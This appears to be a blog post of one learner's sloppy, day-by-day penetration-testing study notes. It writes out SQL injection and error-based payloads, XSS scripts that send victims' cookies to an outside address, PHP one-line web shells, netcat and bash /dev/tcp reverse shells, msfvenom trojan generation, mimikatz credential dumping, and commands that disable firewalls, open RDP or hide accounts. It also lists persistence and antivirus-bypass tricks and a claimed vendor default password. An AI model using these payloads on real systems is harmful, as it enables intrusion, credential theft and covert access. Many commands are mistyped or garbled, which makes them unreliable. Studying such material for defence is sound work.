The Road to Network Security: My Systematic Penetration Testing Learning Framework

Category: Tag:

Note: The following content only records the relevant knowledge that I did not know when I was studying. The notes are sloppy and may be wrong, for reference only. I will gradually improve it!

Basically complete penetration testing framework

Day1

Chmod

Mv modify file name

The http request contains:

Request line

Request header

Request body

Get request has no request body

GET vs POST

1. Request parameters

-get

501 Method not implemented

3xx redirect

Sql injection:

1. Judge’or”

2. Comment: # or–

Joint query:

1.Order by

2.union select 1,2

3. Library database()

4. Table information_schema.tables

5. Column union select column_name, 2 from information_schema.columns where table_schema=database() and able_name=’users’#

6.Content union select user,password from users#

And ascii(mid((select user from user 0,1),1,1))>96

Boolean injection (violent injection):

And 1=1

And 1=2

Library

Table exists(select * form users)

Column exists (select column name form users)

Content and select user from users limit 1,2 / select mid(“hello word”,2,1) take one from the second line

0-9: 48 0x30

a-z: 97 0x61 select ascii(‘A’)

select ascii(‘A’)

A-Z 65 0x65

URL encoding: start with %, %20 is a space

Sleep() delay usage Select if(exist(select * frrom user),sleep(5),3)

Assignment: hub.docker.com

3, 5, 9 questions

Docker pull

Docker run

Day3:

comcat(“hell”,”word!”) splicing

Select ord(‘:’) view accii

Hex(68) Check hexadecimal

Group_concat(username,0x3a,password) one line display

-Error injection:

-floor

Select floor((rand(0)*2)

Rand(0) random number

-updatexml(1,comcat(0x7e,version(),0x7e),3) version() can be replaced with sql statement

-extractvalue in the same way

-Second order injection:

-insert into users claus(‘admin’,’pwd’)

-update usersset pwd=’123′ where name=’name’

-Universal password

-File reading and writing

-premise:

-File

-my.cnf/my.ini

-secure_file_priv=”

-Read files

-load_file (‘path’) absolute path

Etc/passwd stores user information

-Write file

-into outfile’path’

-into dumpfile’path’

-Bypass technology

-Replace or=|| and =&&

-Case

-Double writing. To combat this, you can use a loop to continue filtering until there is no

-Inline comments

-Space %20+ — ,)), %a0 %0b –=ss %2b

-Comment # +–+ —-> Close is to close the following

-POST

-sqlmap

-Basic use

1.judgment Sqlmap -u “url”
2.library sqlmap -u “url” –dbs /–current-db
3.table sqlmap -u “url” -D db –tables
4.Column sqlmap -u “url” -D db -T tb –columns
5.content sqlmap -u “url” -D db -T tb -C col –dump
For post type Sqlmap -r 1.txt
Sqlmap -r 1.txt -vv -D security                                     –v Show detailed information, including what was entered

-Write tamper

-Command execution

-Multiple command symbols

|| (or) can be executed later when the front is false

|

&& One&

Background process

Wget

Echo

-File contains

-#include<stdio.h>

-PHP include() require()

Config.inc.php –db

Example: http://localhost:8001/vulnerabilities/fi/?page=../../../../../etc/passwd

-LFI

-No matter what the suffix is, as long as there is php code in it, it will be executed

-php pseudo protocol

-php://filter/read=convert.base64-encode/resource=1.php

<?php

System(‘whoami’)

?>

-RFI

-http://localhost:8001/vulnerabilities/fi/?page=http://192.168.38.1/1.txt remote file contains

-XSS (html injection)

-js statement

-document.cookie to get cookie

-Storage type

<script>document.location=’http://your address’+document.cookie</script>

<script>

document.write(“img src=’http://”+document.cookie+”‘/>”);

</script>

-File upload (capture package, send reper, modify suffix)

-A sentence

<?php @eval($_post[1]);?>

<?php@system($_get[1]);?>

<?php $_get[0]($_post[1]);?> When connecting, add 0=access after the link

Client tools:

Ant Sword

Principle; 1=@eval(base_decode($_POST[2]));$2=system(‘ls …/’);

-an examination

-Client js detection

-Suffix

-Capitalization php3,,php4,php5 ,phtml

Apache:

-.htaccess

Content: AddType application/x-httpd-php gif Meaning: parse the gif file according to php

-Types of

-image/gif

-image/png These are the contentType attributes

-image/jpeg

-File header

-GIF89a gif file header

-document content

<?php $_GET[0]($_post[1]);?> ?0=assert

Day 6

-xss

-beef software

-Blue Lotus

-File contains

-php://input

-File Upload

-00 truncated

-webgoat

-hashcat -a 0 -m 0 md5.hash dictionary path

Day7

-XXE

chown belongs to group Eg: chown www-data upload

chgrp reorganization

Reboot shutdown -r now restart

Init 0 shutdown

Day8

-jwt json format web token

-HS256 is HMAC-SHA256

Hashcat -a 0 -m 1450 (Sash id) hash file dictionary path

def hmac_base63(key,message): return base63.urlsafe_b64encode(bytes.fromhex(hmac.new(key,message,hashlib.sha256).hexdigest()))

Day9

-OWASP top 10

-Leakage of sensitive information

-transmission

-storage

-Unsafe deserialization

<?php

$Aaa=arry(“1″,”2”,123);

Echo serialize($aaa);

?>

result:

Book: “OWASP Testing Guide”

“Hacker Attack and Defense Technology Collection-Web Actual Combat”

website:

Vulhub.org vulnerability test range

Vulnhub.com

-frame

-Flask

-Multithreading

Day10

-cisp

Software website:

-Ip138

-licence

Safety products:

-Gateway: EW, ZPS, FS

-Terminal category: AV, patch, NAC network access control, EDR, DLP

-Audit category: log audit, database audit, VPN, fortress machine

-Monitoring category: APT, SOC, honeypot

Day 11:

-Wait for guarantee

Day12:

-php7 Trojan implementation

-A sentence

-poc proof of concept

-paylood

-Link layer CRC

-Network layer: packet, only header

-DNS resolution uses udp, server and server use tcp

-vi command

-x delete the current character

-dd delete the current line

-comm -1 1.txt 2.txt Find the same and different

-diff 1.txt 2.txt find the difference

-diff -c 1.txt 2.txt View all the information -u, after deduplication, display together

-vimdiff 1.txt 2.txt

-ps view process

-tail 1.txt

-tail -f 1.txt monitors the growth behind the file. Vim does not seem to work.

-watch -n 5 monitor -n is a few seconds to refresh

-watch -n 5 w monitor w command

-wget download file

-curl -o download file

-Environmental preparation

-windows7

-windows2008R2 https://msdn.itellyou.cn/

-linux

-ubuntu 14/metasploit2 vulnhub.com

-tool

-Swiss knife netcat

-nc -lvp 3333 open a port

-nc -l localhost 4444 link port

-n does not display nds parsing information

-v show detailed information

-e followed by the command

-file transfer

-Recipient nc -lvp 4444> 1.txt

-Sender nc ip/domain name port <1.txt

-Bind shell

-Server nc -lvo 444 -e cmd.exe

-Attacker nc -nv ip port -e cmd.exe

-Reverse shell

-attacker

-nc -lvp 444

-server

-nc -nv ip port -e cmd.exe

Day12

-collect message

-initiative

-DNS

-port/os

-nmap

-nmap -p- -Pn -n ip

-nmap -p 21 -sV -Pn -n –script==xx ip

-Nmap -O ip

-Nmap -A -F ip

-nmap -Pn -n –script=ftp-vsftpd-backdoor 192.168.174.129

-vuln scan

-debian6 amd64 .deb sudo install ./nessusxxxx.deb sudo service nessusd start

-web scan

-AWVS

-IBM appscan

-hp webinspect

-xray

-xary webscan –listen 127.0.0.1: 7777 –html-output 1.html

-Combined with bp

-Set connections under user options

-destination host:ip

-proxy host:127.0.0.1

-proxy port:7777

-passive

-whois registration information

-Webmaster’s Home

-Microstep

-google hacking

  • -site:
  • -filetype:File type Preceded with-sign means not to look at this type
  • -inurl:
  • -error:What errors have been reported
  • -GHDB

-record

Megacorpone.com

-Password cracking

-dictionary

Wordpass.com

-Generate (Social Engineering Dictionary)

-cewl cewl -d 2 -m 6 -w ./1.txt http://www.megacorpone.com

Sudo apt install crowbar

Online cracking (remote): medusa hydra

Network service (db, ftp, ssh, rdp)

Web-burp

Http basic

Offline cracking (local) hash– which kind of hash the hashid command identifies

-windows

C:\windows\system32\SAM-Registry-system

-hash is: NT/NTLM

-Tools pwdump7/samdump2

-linux

-/etc/passwd

-/etc/shadow

-hash512 is doing encryption

-rainbow rainbow table address:

-In memory-plaintext

-mimikatz

Privilege::debug

Sekurlss::logonpasswords

-mysql

-other hash

Day14

-Implementation process

Communicate with technical dockers

-Default port number (global port) range 0-1035

Firewall/ips/icg configuration mode

-Bridge mode (transparent mode)

-In-generation management

-External management

-Routing mode (not commonly used)

-Bypass mode

Day15

-ICG management method

-Web

-Console baud rate is 9600 icgadmin/netentsec

-Ssh(13289)

-The default management address of the firewall: https://10.0.0.1

msfvenom

From <https://blog.csdn.net/ZmeiXuan/article/details/78061755>

Policy routing priority

-Host routing -> Direct routing -> Static routing (including dynamic routing) -> Policy routing -> ISP routing -> Default routing

Day16

-Vulnerability analysis/exploitation

-Application layer: web

-Universal owasp top10

-CMS: wordpress/discuz/joomla

-Development Framework

-php: thinkphp

-java: SSM

-Python: Flask/Django

-General framework: es

-Middleware: tomcat/weblogic

CVE/exploit-db this is a website/searchsploit

-database:

-Relational: mysql, msssql, oracle

-Non-relational: redis/mongodb

-operating system

-windows

-445

-linux

-Dirty cow (dirtycow)

-Network layer:

Variables start with $

Fuzz fuzz test

Phpinfo()

Substring(database_version(),1,1)

From

who am I

Not absolutely safe

Github: list

Kali restart network command

Sudo systemctl restart networking

Sudo systemctf restart NetworkManager

0-65536

2Mbps=0.25MBps

The default account password for all QiAnXin products:

Admin/!1ws

Write a sentence under linux, pay attention to escape

Low authority:

Right escalation:

-Local/remote

-Exploit OS vulnerabilities

-database

-third-party usage

Exploit

-.py

-.php

-.pl perl language

-.rb ruby ​​language is generally used for msf

-.c run after gcc is compiled

-Vulnerabilities in .txt/.md webapps

-Scan the background

-dirb tool

Linux permissions

-rw-r–r– 1 This number is for directories, all directories have two subdirectories,. and ..

10 people

User group other

-: ordinary file

d: directory

l: link (shortcut)

b/c: device file

-rws r-x r-x where s means that other users execute the file with the permissions of the file owner

The octal representation is 4755, the other is displayed as t, which means tmp temporary file

There are many rights escalations on github on linux and windows

In the Passwd file:

root:x:0:0:root:/root:/bin/bash x One digit means a placeholder for the password, if not, it means no password

In the shadow file:

root:!:18470:0:99999:7:::! Indicates that you cannot log in, cannot log in, or is locked. 18470 indicates the number of days subtracted from January 1, 1970, which is the time when the password was last modified

linux firewall

Iptables

Iptables

Setenforce

View os information:

Os-release

Lsb=release

Users added under the Etc/sudoer.d file can use sudo

Find files with s permissions Sudo find / -perm -4000 2>/dec/null

touch create file

Echo “`Command`” Backquote means to execute as a command

DAY17

-Windows basics

Help document command/?

-system message

ver

Winver

systeminfo

-user

-Computer management: compmgmt.msc

-SAM is essentially the registry-the command is: regedit

The group policy command is: gpedit.msc

SID:

administrator 500

Guest 501

Net user View user

Net user username password change password

Net user username /active:yes activate account

See the help document for others

Add $ to the end of the username to hide the account

Net localgroup administrators view this group

-Firewall

Turn off firewall

-net stop shareacce

-netsh firewall set opmode disable

-netsh advfirewall set allprofile state off

-Open 3389

Reg add “HKLM\system\currentcontrolset\control\terminal server” /v fDenyTSConnections /t reg_dword /d 0 /f

-View port

-reg query “HKLM\system\currentcontrolset\control\terminal server\winstation\rdp-tcp” /v portnumber

After Msfvenom generates the Trojan, enter the msfconsole and use the following command: Use exploit/multi/handler

-Change environment variable command

-export

Su tom switch user

Day18

-gobuster tool

nmap escalation

git escalation

awk escalation

msf monitor exploit/mu msfvenom generation: msfevom -p payload lhost=ip -f exe -a x64 -o shell.exe

Day19

firewall

-linux turn off the firewall

-service iptables stop

-sysytem

-bash -I >& /dev//tcp/ip/port 0>&1

-powershell

-Port forwarding

-msf can do

rdesktop tool command: rdesktop ip

The first step is to generate a rebound exe through msfv and pass it to the other party

The second part, msfc turns on monitoring, and the other party runs exe

The third step, after the link, execute the remote desktop port forwarding command

The fourth part. Link your own 3389, use rdesktop command

VM Network

-Net

-bridge

-host only

Linux default proxy /etc/proxychains

Nmap scan is best to add -Pn (prohibit ping scan) for protocol reasons, such as

Day20

Msf – post

Cobalt strike – red team

aisle:

-dns/icmp

Ice scorpion West thorn agent (free agent exchange ip)

Kerbors authentication in windows domain name–golden ticket–SSO

-tgt ticket license ticket

The privilege escalation module is often used in the msf domain, search psexec

Day21

file transfer

Ftp

-filezilla/server-u

-pure-ftpd/vsftpd

Put and get

Http

Echo $webclient = New-Object System.Net.WebClient >> open a web client under wget.psl windows

Echo $url = “http://192,.168.174.128:4444/hello.txt”>>wget.psl file address under kali

Echo $file=”exploid.txt” >> The name of the file saved in wget.psl under windows

Echo $webclient.DownloadFile($url,$file) >>wget.psl download file

The premise of the following execution is to open a web service under kali

Powershell.exe -ExecutionPolicy Bypass -Nologo -Nonlnteractive -Nologo -noninteractive -noprofile -file file name or

Powershell.exe -ExecutionPolocy Bypass -File filename

Powershell.exe (new-object system.net.webclient).downloadfile

Anti-software bypass

-Signature bypass

-sandbox

Static

-PE/ELF

-IDA PRO

dynamic

-debugging

-Sandbox-Behavior-Monitor files/registries/network connections

Shellter tool, inject code into normal PE files, such as notepad.exe, and it must be a 32-bit program

Empire tool, similar to msf, written in powershell, mostly powershell modules

Permission maintenance

-windows

-shift

sethc.exe

-Image hijacking

-Remote Control Trojan

-linux

-suid

-ld_preload

Clean up traces

Metasploit3 drone penetration

The binwalk command separates whether the image is multiple files

Knock ip port

View Knockd.conf can use knock technology

View file attributes command under windows

Sttrib

Encryption under windows has EFS and

Bitlocker (encrypt hard disk)

icacls under windows is the command to change permissions

View file attributes under lsattr under linux

Intranet penetration agent cannot use vpn or frp

To be continued………….

Reviews

There are no reviews yet.

Be the first to review “The Road to Network Security: My Systematic Penetration Testing Learning Framework”

Your email address will not be published. Required fields are marked *